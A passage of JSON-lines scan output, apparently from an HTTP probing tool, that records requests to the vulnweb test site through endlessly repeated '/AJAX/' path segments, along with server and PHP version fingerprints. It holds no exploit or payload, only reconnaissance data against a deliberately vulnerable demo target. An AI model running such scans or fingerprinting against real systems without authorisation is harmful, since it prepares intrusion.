AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/categories.php\",\"time\":\"350.781813ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:36.673448335Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/disclaimer.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/disclaimer.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/disclaimer.php\",\"time\":\"344.299694ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:38.354431905Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/guestbook.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/guestbook.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/guestbook.php\",\"time\":\"353.576904ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:39.423395369Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"time\":\"345.071704ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:39.706507295Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=1\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=1\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=1\",\"time\":\"353.513725ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:40.000620958Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=2\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=2\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=2\",\"time\":\"344.962336ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:40.744681601Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=3\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=3\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=3\",\"time\":\"344.254519ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:40.779291551Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=4\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=4\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/listproducts.php?cat=4\",\"time\":\"353.465845ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:40.82219549Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/login.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/login.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/login.php\",\"time\":\"340.961354ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:40.863179693Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/privacy.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/privacy.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/privacy.php\",\"time\":\"353.175556ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:40.906008352Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/A